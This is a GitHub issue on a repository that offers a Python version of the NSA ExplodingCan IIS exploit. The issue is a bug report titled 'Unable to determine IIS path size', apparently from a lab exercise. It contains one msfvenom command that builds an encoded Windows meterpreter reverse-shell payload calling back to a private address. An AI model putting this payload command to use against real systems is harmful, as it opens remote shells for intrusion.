danigargu / explodingcan

An implementation of NSA's ExplodingCan exploit in Python
261 stars 62 forks source link

Unable to determine IIS path size #7

Open TryHard3r opened 2 years ago

TryHard3r commented 2 years ago
sudo msfvenom -p windows/meterpreter/reverse_tcp -f raw -v sc -e x86/alpha_mixed LHOST=10.10.14.5 LPORT=443 | tee shellcode
image